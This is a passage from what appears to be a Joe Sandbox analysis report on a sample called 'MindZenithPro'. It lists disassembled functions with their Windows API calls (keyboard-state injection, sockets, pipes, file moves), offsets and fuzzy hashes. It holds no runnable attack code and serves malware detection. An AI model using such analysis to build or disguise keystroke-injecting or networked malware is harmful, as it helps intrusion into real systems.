                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 614568839-2785691316
                                    • Opcode ID: ac11a902863775a57ab4579f992585248be78d8404bda82c20eba0e265ea989f
                                    • Instruction ID: 4803cd75977eb9d20685d18f25eb41cd7b4c8c570f0d1ef328d16e53b55ae203
                                    • Opcode Fuzzy Hash: ac11a902863775a57ab4579f992585248be78d8404bda82c20eba0e265ea989f
                                    • Instruction Fuzzy Hash: AE912871D0061DAFDF11DFA4D880EEEB7B9AF08304F10856AE815AB251DB349E44CFA5
                                    Function 004528B8 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenu.USER32(?), ref: 0045293E
                                    • GetMenuItemCount.USER32(00000000), ref: 00452970
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00452998
                                    • _wcslen.LIBCMT ref: 004529CE
                                    • GetMenuItemID.USER32(?,?), ref: 00452A08
                                    • GetSubMenu.USER32(?,?), ref: 00452A16
                                      • Part of subcall function 00424128: GetWindowThreadProcessId.USER32(?,00000000), ref: 00424142
                                      • Part of subcall function 00424128: GetCurrentThreadId.KERNEL32 ref: 00424149
                                      • Part of subcall function 00424128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00422C95), ref: 00424150
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00452A9E
                                      • Part of subcall function 0042EFBC: Sleep.KERNEL32 ref: 0042F034
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                    • String ID:
                                    • API String ID: 4196846111-0
                                    • Opcode ID: 1ee870456a8466e731a1d31dc180c459a99f8a724ad69979b8e9389cb28ecdf5
                                    • Instruction ID: e97e70b655b453a9fef38f3cd693e067f14d5708f57a95111853324ddf9d152f
                                    • Opcode Fuzzy Hash: 1ee870456a8466e731a1d31dc180c459a99f8a724ad69979b8e9389cb28ecdf5
                                    • Instruction Fuzzy Hash: B671C075E00215AFCB11DF64C941AAEB7F1EF49311F10846AE816EB342D778EE42CB94
                                    Function 0045858A Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(00D65370), ref: 00458623
                                    • IsWindowEnabled.USER32(00D65370), ref: 0045862F
                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0045870A
                                    • SendMessageW.USER32(00D65370,000000B0,?,?), ref: 0045873D
                                    • IsDlgButtonChecked.USER32(?,?), ref: 00458775
                                    • GetWindowLongW.USER32(00D65370,000000EC), ref: 00458797
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004587AF
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: e77368b3c6a1887f9a32fc3f989894ce899a0502d12a92da4b191f57f0b9becc
                                    • Instruction ID: 46e42e24bd272cdb24972b9adafa0cb3229ba91b972421721886bfeaebce6dbc
                                    • Opcode Fuzzy Hash: e77368b3c6a1887f9a32fc3f989894ce899a0502d12a92da4b191f57f0b9becc
                                    • Instruction Fuzzy Hash: 93718A74601204AFEB219F55C884FAB7BA9EF49302F14006FEC45A7363CF39A959CB18
                                    Function 0042CBB5 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C3914: _wcslen.LIBCMT ref: 003C3919
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0042CCD3
                                    • _wcslen.LIBCMT ref: 0042CD1A
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0042CD81
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0042CDAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info_wcslen$Default
                                    • String ID: ,*I$0
                                    • API String ID: 1227352736-2783321351
                                    • Opcode ID: 8ce19015b049b2350bb775b67b935fc48fbe07ef603fbb07160b84115da0259e
                                    • Instruction ID: d3b888d313831191834ffe08a39ebbee0cec5af6d170e5ba8fc116d3b3cfe3bb
                                    • Opcode Fuzzy Hash: 8ce19015b049b2350bb775b67b935fc48fbe07ef603fbb07160b84115da0259e
                                    • Instruction Fuzzy Hash: C551EE717243209BD7259F29E884B6FBBE4AF45354F440A3AF885D7290D7B8CD04C75A
                                    Function 0042B5BB Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 0042B5FA
                                    • GetKeyboardState.USER32(?), ref: 0042B60F
                                    • SetKeyboardState.USER32(?), ref: 0042B670
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 0042B69E
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0042B6BD
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 0042B6FE
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0042B721
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: efde88ed6f9dee3035a37bd79ddafafeff316ff5106e1387c5827ef9148f70ae
                                    • Instruction ID: 1f2b030dd6be07f822700e7ab7bc6cb9aa9851d7a61782e01f70d83e00c05ec4
                                    • Opcode Fuzzy Hash: efde88ed6f9dee3035a37bd79ddafafeff316ff5106e1387c5827ef9148f70ae
                                    • Instruction Fuzzy Hash: F3510FA0B047E53DFB3242249C45BBBBFA99B42308F48848AE1C5459C3C3ACECC4D799
                                    Function 0042B3DB Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(00000000), ref: 0042B41A
                                    • GetKeyboardState.USER32(?), ref: 0042B42F
                                    • SetKeyboardState.USER32(?), ref: 0042B490
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0042B4BC
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0042B4D9
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0042B518
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0042B539
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 87bb5fbd03aca39c29b2e8145137132b1630884cfd9d28fa5b8c89e65eba8a4a
                                    • Instruction ID: d392b0cbb4a78e1bf12156f17ec2a8bab3db434e20532538a5f86a36f35a0c97
                                    • Opcode Fuzzy Hash: 87bb5fbd03aca39c29b2e8145137132b1630884cfd9d28fa5b8c89e65eba8a4a
                                    • Instruction Fuzzy Hash: 1E5103A0A047E13DFB3692249C55B77BFA8DB05304F88848AE1D55A5C3C79CECC8D798
                                    Function 003F577E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(00404667,?,?,?,?,?,?,?,?,003F5EF3,?,?,00404667,?,?), ref: 003F57C0
                                    • __fassign.LIBCMT ref: 003F583B
                                    • __fassign.LIBCMT ref: 003F5856
                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00404667,00000005,00000000,00000000), ref: 003F587C
                                    • WriteFile.KERNEL32(?,00404667,00000000,003F5EF3,00000000,?,?,?,?,?,?,?,?,?,003F5EF3,?), ref: 003F589B
                                    • WriteFile.KERNEL32(?,?,00000001,003F5EF3,00000000,?,?,?,?,?,?,?,?,?,003F5EF3,?), ref: 003F58D4
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: d31a8c7c73b961d836af935afa6c4489885e3945ff3514748101def69ef0cbfa
                                    • Instruction ID: c5e2e266cf4229ed410550bfc89ccb7818a1cb876c9e2ceab6fb24e7b5039ba9
                                    • Opcode Fuzzy Hash: d31a8c7c73b961d836af935afa6c4489885e3945ff3514748101def69ef0cbfa
                                    • Instruction Fuzzy Hash: 9751CE70A00649DFDB15CFA8D885AFEBBF8EF08310F14412AEA55E7291E7709A41CB60
                                    Function 0044183F Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004437D5: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00443801
                                      • Part of subcall function 004437D5: _wcslen.LIBCMT ref: 00443822
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00441899
                                    • WSAGetLastError.WSOCK32 ref: 004418A8
                                    • WSAGetLastError.WSOCK32 ref: 00441950
                                    • closesocket.WSOCK32(00000000), ref: 00441980
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 2675159561-0
                                    • Opcode ID: 06393e196aa15d82f4925f2901f60253aaa4c96c49b71f2f5e78b69255ad335f
                                    • Instruction ID: 30743afb30878933842b5735c6da327d12861fc0a0c629580eb5cc5aa17db0f5
                                    • Opcode Fuzzy Hash: 06393e196aa15d82f4925f2901f60253aaa4c96c49b71f2f5e78b69255ad335f
                                    • Instruction Fuzzy Hash: 60410771600204AFEB10AF24C845BAAB7E9FF45364F14806AFC559B3A2D774ED81CBE5
                                    Function 0042D4E5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0042E421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0042D507,?), ref: 0042E43E
                                      • Part of subcall function 0042E421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0042D507,?), ref: 0042E457
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0042D52A
                                    • MoveFileW.KERNEL32(?,?), ref: 0042D564
                                    • _wcslen.LIBCMT ref: 0042D5EA
                                    • _wcslen.LIBCMT ref: 0042D600
                                    • SHFileOperationW.SHELL32(?), ref: 0042D646
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 3164238972-1173974218
                                    • Opcode ID: 556d4d06a665b76c1626d5111de5e7ac7fb2aed5c1b59db4f3c9385a30d9234f
                                    • Instruction ID: 88efa903b74187fed5ee32afc7f3e1507fe1bb6c7915c81451fb9401e5119746
                                    • Opcode Fuzzy Hash: 556d4d06a665b76c1626d5111de5e7ac7fb2aed5c1b59db4f3c9385a30d9234f
                                    • Instruction Fuzzy Hash: 94416871D052289EDF12EFA0D981EDE77B8AF08344F5004FBA545EB141EA78A784CB54
                                    Function 004535BB Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004535DA
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045360D
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00453642
                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00453674
                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0045369E
                                    • GetWindowLongW.USER32(?,000000F0), ref: 004536AF
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004536C9
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: a31e876464a75a5ef59bb04dc68b6d7a3d95d132c5243db51327a076b11eacc4
                                    • Instruction ID: d8ec0dde31c85778422ee0f1a55d07540bc683454564d3fa18dc9c379215f4d2
                                    • Opcode Fuzzy Hash: a31e876464a75a5ef59bb04dc68b6d7a3d95d132c5243db51327a076b11eacc4
                                    • Instruction Fuzzy Hash: 66313630704255AFDB31CF08DC84F5A37A1EB59762F15017AF9008B3B2CB75A948DB09
                                    Function 00430BA3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 00430BC3
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00430BFF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 29b6ef48fd14fd72d9e239d40aef1001b8df48aeab5f4e38689d942fe398f2ed
                                    • Instruction ID: 1d34ad443ba89b0424d920511b810e0c7bb5bb9f2bef8a2a39944f398279bb03
                                    • Opcode Fuzzy Hash: 29b6ef48fd14fd72d9e239d40aef1001b8df48aeab5f4e38689d942fe398f2ed
                                    • Instruction Fuzzy Hash: 4D218D70500309EFDB349F28DC18A9A7BA4BF49724F205B2AF8A1D72D1E774D840CB54
                                    Function 00430C78 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00430C97
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00430CD2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 07cffd86b4cf8251441922682920477ab156a5558db2f98e419775aaed4aa3a6
                                    • Instruction ID: 8a04147624ff3cd4962551aabd7893f8df3dcdfe9701dee63f490a0cbed46c6d
                                    • Opcode Fuzzy Hash: 07cffd86b4cf8251441922682920477ab156a5558db2f98e419775aaed4aa3a6
                                    • Instruction Fuzzy Hash: 3D219C35500305ABDB209F699C14A9A7BE8AF59324F301B1AF8A1D72D1EB74E840CB19
                                    Function 0045486D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C66CB: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003C6709
                                      • Part of subcall function 003C66CB: GetStockObject.GDI32(00000011), ref: 003C671D
                                      • Part of subcall function 003C66CB: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C6727
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004548D2
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004548DF
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004548EA
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004548F9
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00454905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 3e969d4282c23bb04bc1b55570adb3fc23aa16055f94f5e02aee0d41ae1541f8
                                    • Instruction ID: 65b58d7a03175a1cfb9760db1f301455575aacc37b8b986ec3b45c3b1e4b9694
                                    • Opcode Fuzzy Hash: 3e969d4282c23bb04bc1b55570adb3fc23aa16055f94f5e02aee0d41ae1541f8
                                    • Instruction Fuzzy Hash: 2F11B6B115021D7EEF119F64CC82EE77F9DEF08758F004111BA08E6151CA75DC66DBA4
                                    Function 003FDB30 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003FDAF4: _free.LIBCMT ref: 003FDB1D
                                    • _free.LIBCMT ref: 003FDB7E
                                      • Part of subcall function 003F2D18: RtlFreeHeap.NTDLL(00000000,00000000,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?), ref: 003F2D2E
                                      • Part of subcall function 003F2D18: GetLastError.KERNEL32(?,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?,?), ref: 003F2D40
                                    • _free.LIBCMT ref: 003FDB89
                                    • _free.LIBCMT ref: 003FDB94
                                    • _free.LIBCMT ref: 003FDBE8
                                    • _free.LIBCMT ref: 003FDBF3
                                    • _free.LIBCMT ref: 003FDBFE
                                    • _free.LIBCMT ref: 003FDC09
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5bed66935a953271b091b4d9d44be1d81363ccd6ac0d0396f486d9816b5a5bca
                                    • Instruction ID: 461dc188b85987b4051da11ad61ab0b940cec8e7ee18fdd1c8f0acd922312597
                                    • Opcode Fuzzy Hash: 5bed66935a953271b091b4d9d44be1d81363ccd6ac0d0396f486d9816b5a5bca
                                    • Instruction Fuzzy Hash: 94115E71544B0CEAEA22FBB0CC0BFEB779DAF40700F440815B3A9AE052DAE5B5098690
                                    Function 0042E048 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0042E062
                                    • LoadStringW.USER32(00000000), ref: 0042E069
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0042E07F
                                    • LoadStringW.USER32(00000000), ref: 0042E086
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0042E0CA
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 0042E0A7
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 4072794657-3128320259
                                    • Opcode ID: 7f7274b778672762b92888424a88a674767f59f4b2196e4eb350ad6a0386934f
                                    • Instruction ID: e2826b6a45cf214f4b7e4e42747da200a39a63d8a14350e2b1f8a989d0b12d26
